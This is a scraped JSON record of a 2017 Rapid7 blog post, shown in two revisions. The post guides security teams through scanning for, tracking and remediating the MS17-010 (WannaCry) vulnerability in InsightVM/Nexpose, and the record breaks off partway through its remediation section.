"id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 20, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- 
[DocumentBodyStart:7799e1bb-a165-4562-9f7e-a380f1695f31] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. 
</strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" 
width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. 
</span></p></div><!-- [DocumentBodyEnd:7799e1bb-a165-4562-9f7e-a380f1695f31] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-20T14:50:01"}, "differentElements": ["description", "published", "modified"], "edition": 4}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:671843e7-7237-482e-9c1c-b149f122c46e] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. 
</strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access, an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 6/7/17: Fixed a small error in the dynamic asset group/dashboard section. We also now have a pre-built WannaCry dashboard in InsightVM***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. 
First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. 
Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a 
href=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\"><img class=\"jive-image\" height=\"260\" src=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\" style=\"height: 280px; width: 815px;\" width=\"758\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! 
If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
